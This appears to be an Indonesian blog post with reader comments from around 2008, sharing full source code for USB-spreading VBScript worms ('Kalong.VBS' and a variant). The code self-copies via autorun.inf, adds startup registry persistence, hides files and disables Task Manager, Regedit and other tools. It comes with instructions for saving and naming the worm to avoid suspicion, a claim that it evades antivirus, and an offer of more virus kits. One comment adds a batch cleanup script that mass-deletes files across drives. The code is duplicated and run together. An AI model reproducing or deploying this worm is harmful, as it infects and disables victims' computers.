‘//–Manip – Disable klik kanan–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//if check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
kawan kawan buka notepad kalian salin scrib di bawah ini simpan dengan nama erwinda_putra.exe.vbsAWAS…!!!!virus ini sangat berbahaya…apapun yang terjadi bukan tanggungan saya…
SALAM MESRA BUAT HACKER PADANG YE…SALAMAT UNTUK PENGHANCURKAN..
=====================================================‘El Magnifico MANon error resume nextdim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sdatr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text=mf.openastextstream(1,-2)do while not text.atendofstreammysource=mysource&text.readlinemysource=mysource & vbcrlfloopdoSet winpath = fs.getspecialfolder(0)set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)tf.attributes = 32set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)tf.write mysourcetf.closeset tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)tf.attributes = 39for each flashdrive in fs.drivesIf (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” thenset tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)tf.attributes =32set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)tf.write mysourcetf.closeset tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)tf.attributes =39set tf =fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)tf.write atrtf.closeset tf =fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes=39end ifnextset rg = createobject(”WScript.Shell”)rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″if check 1 then
Wscript.sleep 100000end ifloop while check1set sd = createobject(”Wscript.shell”)sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _“iko permainan yang paten ma dunsanak” & vbcrlf & _vbcrlf & vbcrlf & _” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _” aaa kini saaiknyo ma dunsanak”
loop==========================================================OIA NE PROMOSI DIKIT…KALO KALIAN KEPENGEN BUAT VIRUS…GW BANYAK PROGRAM BUAT VIRUS..KUNJUNGI AJA IMAEL GW OK…NE…
SAYA BAKAL NGIRIMIN NYA DEH…KHUSUS BUAT KAWAN2 OK..BYE..2
Pernahkah anda merasa diri anda seperti anti virus??? yeah itulah yang pernah gw rasa’in knapa???bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!!
Yang paling parah_Nye lagi, ada yang nekat bawa laptop_Nye keTempat Gw, Sepertinye Dia Yakin kalo gw bisa ngebasmi tuh virus padahal belum tentu(Menyedihkan)…setelah gw terawang ternyata virus_Nye cuma virus kacangan, sehingga dengan bermodal notepad pun bisa dibersihin ampe tuntas Coz Virus_Nye kaga’ meng Handle CommandPrompt N Task Manager, but jika proses virus_Nye diMatiin lewat Task Manager ga’ bisa, karna ada dua proses yang running, kalo yang atu dimatiin maka yang atu lagi akan memanggil_Nye lagi….untuk itu gw memanfaatkan notepad N gw tulis
@echo offecho matiin proses virus_Nyetaskkill /F /IM namavirus1.exe /IM namavirus2.exeecho apus Semua virus_Nye berdasarkan ukuran
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”echo apus virus yang Nyamarecho untuk drive c N subfolder_Nyefor /R C:\ %%a in (*.doc.exe) do del “%%a”echo untuk drive d N subfolder_Nyefor /R D:\ %%a in (*.doc.exe) do del “%%a”echo Ngembaliin Document yang diHiddencd /d c:\echo untuk drive C N subfolder_Nyeattrib *.doc -H -S -A /Scd /d d:\echo untuk drive D N subfolder_Nyeattrib *.doc -H -S -A /Sexit
gw simpen script tersebut dengan nama 4L13N.batSelesai dech tinggal normalin registry_Nye N terakhir gw cuma dapet ucapan thank’s
Firman Sitompul berkataJuli 21, 2008 pada 4:42 pm
aku malah ada dapat cara bikin virus dari notepad nih
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//on error resume next
‘//–Dim kata-kata berikut ini–//dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)Set windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 32set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)tf.write rekursiftf.closeset tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 39‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives‘//–Cek Drive–//If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes =32set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)tf.write rekursiftf.closeset tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//set tf =fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes=39end ifnext
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFolderOptions”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//if check 1 thenWscript.sleep 200000end ifloop while check 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
sama ini juga copy pastehehehehe